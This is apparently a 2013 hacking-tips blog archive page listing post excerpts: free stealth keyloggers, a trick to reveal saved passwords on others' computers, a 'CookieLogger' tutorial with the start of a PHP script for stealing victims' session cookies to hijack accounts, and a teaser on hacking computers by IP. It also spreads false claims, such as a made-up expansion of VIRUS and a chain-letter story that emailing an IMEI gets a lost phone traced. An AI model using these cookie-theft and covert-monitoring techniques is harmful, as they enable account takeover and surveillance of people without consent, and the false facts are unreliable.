Skip to main content

Posts

Showing posts from July, 2013

10 Free Keyloggers

10 Free Keyloggers to monitor your Local PC or Laptop! Here is an exclusive list of top 10 free local keyloggers. However If you are planning to monitor only your PC or any PC which you have control of, then you can blindly go for “Hardware Keyloggers” as they are the safest keyloggers and operate in a complete stealth. If you Still wanna Prefer Free Keyloggers then below is the list of Free keyloggers that will really help you monitor your PC. 1) REFOG Free Edition Refog Free Keylogger beats competition in two respects: it’s simple to use and it’s free. REFOG Free Keylogger can look after your children without them even noticing. Even technically minded children won’t detect the key logger when it runs in a stealth mode. The program removes all the shortcuts and can be accessed only through a hot key combination. Running unobtrusively from the moment the system boots, REFOG Free Keylogger keeps track of all typed or pasted text. [ Download Link  ] 2) Black box express Simp

Full Forms Of Computer Related Terms.

Full form of computer related terms : * HTTP - Hyper Text Transfer Protocol. * HTTPS - Hyper Text Transfer Protocol Secure. * IP - Internet Protocol. * URL - Uniform Resource Locator. * USB - Universal Serial Bus. * VIRUS - Vital Information Resource Under Seized. * 3G - 3rd Generation. * GSM - Global System for Mobile Communication. * CDMA - Code Divison Multiple Access. * UMTS - Universal Mobile Telecommunication System. * SIM - Subscriber Identity Module. * AVI = Audio Video Interleave * RTS = Real Time Streaming * SIS = Symbian OS Installer File * AMR = Adaptive Multi-Rate Codec * JAD = Java Application Descriptor * JAR = Java Archive * JAD = Java Application Descriptor * 3GPP = 3rd Generation Partnership Project * 3GP = 3rd Generation Project * MP3 = MPEG player lll * MP4 = MPEG-4 video file * AAC = Advanced Audio Coding * GIF = Graphic Interchangeable Format * JPEG = Joint Photographic Expert Group * BMP = Bitmap * SWF = Shock Wave Flash * WMV = Wind

How To Find The IP Address Of A Website

In many IT trickz and hack, We need to know the IP ( Internet Protocol ) address of the Website. Like if the website is blocked in the System then we can access it if we own the IP address of that website. But the Question arises that.. How to Find the IP Address of  Website ? Step 1 : Open Command Prompt. ( Go to Run and type cmd and hit Enter )

Reveal Hidden Passwords (Asterisks) In Any Web Browsers

Many people save their Passwords in their personnel Computers or Laptops and some time in Cyber Café or in friends system. So there is a trick to known that Passwords ☺ . Now How To Reveal Hidden Passwords (Asterisks) In any Web Browsers ??? Step 1 : Go to any Website which contains saved password. Step 2 : Right Click on the Password Box and click on Inspect element. Step 3 : You’ll now notice the bottom quarter of your screen filled with codes. You only need to focus on the highlighted (in blue) part to reveal the password. Step 4 : Look for type="password" and double click on it. Replace the word ‘password’ with ‘text‘. Step 5 : It should now look like type="text". Hit Enter. After you’ve changed that, the text behind the asterisks or bullets will be revealed.

CookieLogger and Hack any Account

Create a CookieLogger and Hack any Account! Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc. What is a CookieLogger? A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today we are going to show How to make your own Cookie Logger… Hope you will enjoy Reading it … Step 1: Save the notepad file from the link below and Rename it as Fun.gif: http://crocko.com/ 1702516956.html Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php: <?php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry fo

Download Youtube Videos Through VLC

Download Youtube Videos Through VLC Firstly grab the URL of the YouTube video page. 1. Now open VLC > Click on "Media" > Open "Network Stream". 2. Paste the URL and click "Play". 3. Once VLC starts streaming the video, Click "Tools" > "Codec Information" and at the bottom of the window you will see a "Location Box". 4. Copy the URL and paste it on your browser’s address bar. The browser will now download the file which you can save it to your hard disk. Alternatively, you can record the video....

Top Ten Password Cracking Methods

Top Ten Password Cracking Methods ================ 1. Dictionary attack "This uses a simple file containing words that can, surprise surprise, be found in a dictionary. In other words, if you will excuse the pun, this attack uses exactly the kind of words that many people use as their password..." 2. Brute force attack "This method is similar to the dictionary attack but with the added bonus, for the hacker, of being able to detect non-dictionary words by working through all possible alpha- numeric combinations from aaa1 to zzz10..." 3. Rainbow table attack "A rainbow table is a list of pre- computed hashes - the numerical value of an encrypted password, used by most systems today - and that’s the hashes of all possible password combinations for any given hashing algorithm mind. The time it takes to crack a password using a rainbow table is reduced to the time it takes to look it up in the list..." 4. Phishing "There

Track Lost Mobile

IF YOU LOSE YOUR MOBILE PHONE : If u lose your mobile, Got an interesting fact to share.. Nowadays each one of us carries Hi Fi Mobile devices and always fears that it may be stolen. Each mobile carries a unique IMEI i.e.- International Mobile Identity Number which can be used to track your mobile anywhere in the world. This is how it works!!!!!! Step 1. Dial*#06# from your mobile. Step 2. Your mobile shows a unique 15 digit. Step 3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft Step 4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net Step 5. No need to go to police. Step 6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet. Step 7. You will find where your hand set is being operated even in case your no is being changed. PASS ON THIS VERY IMPORTANT MESSAGE TO ALL YOUR FRIENDS AND RELATIVES. If u lost your mobile, send an e-m

HOW TO HACK REMOTE COMPUTER USING IP ADDRESS?

HOW TO HACK REMOTE COMPUTER USING IP ADDRESS? Note: we are not responsible what you are going to do with this trick FIRSTLY WE WILL TELL YOU WHAT IS INTERNET PROTOCOL (IP) The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house

Internet Protocols.

TCP - Transmission Control Protocol TCP is used for transmission of data from an application to the network. TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive. IP - Internet Protocol IP takes care of the communication with other computers. IP is responsible for the sending and receiving data packets over the Internet. HTTP - Hyper Text Transfer Protocol HTTP takes care of the communication between a web server and a web browser. HTTP is used for sending requests from a web client (a browser) to a web server, returning web content (web pages) from the server back to the client. HTTPS - Secure HTTP HTTPS takes care of secure communication between a web server and a web browser. HTTPS typically handles credit card transactions and other sensitive data. SSL - Secure Sockets Layer The SSL protocol is used for encryption of data for secure data transmission. SMTP - Simple Mail Trans